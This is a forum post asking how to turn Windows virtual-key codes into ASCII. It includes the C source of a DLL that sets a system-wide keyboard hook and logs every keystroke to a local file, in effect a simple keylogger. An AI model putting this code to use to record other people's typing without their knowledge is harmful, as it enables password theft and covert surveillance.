I have a program that records keyboard input and writes it to a file, but I think the program receives the keyboard values corresponding to certain characters, and not the ASCII values. Ex: The character ";" is recorded as 186 instead of the ASCII value, 59.

The program is a DLL:

Code:
#include <windows.h>
#include <stdio.h>

FILE *f1;
static HHOOK hkb=NULL;

int __stdcall __declspec(dllexport) KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {

    int ch;
    LPTSTR keyname;
    
    if (nCode < 0) {
        return 1;
    }
    
    ch = wParam;
    
    
    if (GetAsyncKeyState(ch) == 0) {

            f1=fopen("C:\\templog.txt","a+");
            if (f1) {
                   fprintf(f1,"%d;",ch);
                   fclose(f1);
            }
    }
    

    LRESULT RetVal = CallNextHookEx(hkb,nCode,wParam,lParam );

    return 0;

}

HHOOK __stdcall __declspec(dllexport) installHook(HINSTANCE hins) {
    f1=fopen("C:\\report.txt","a+");
    fclose(f1);
    hkb=SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)KeyboardProc,hins,0);
    return hkb;
}
If the values are indeed corresponding to how the keyboard interprets them, is this in any way, keyboard-specific?

Is there any way of efficiently modifying the recorded values - besides the pathetic task of testing to see the keyboard values of each character, and then creating a substitution cipher, that checks each character and modifies it's value - to the ASCII correspondants?

My best guess is that this question belongs in Windows Programming.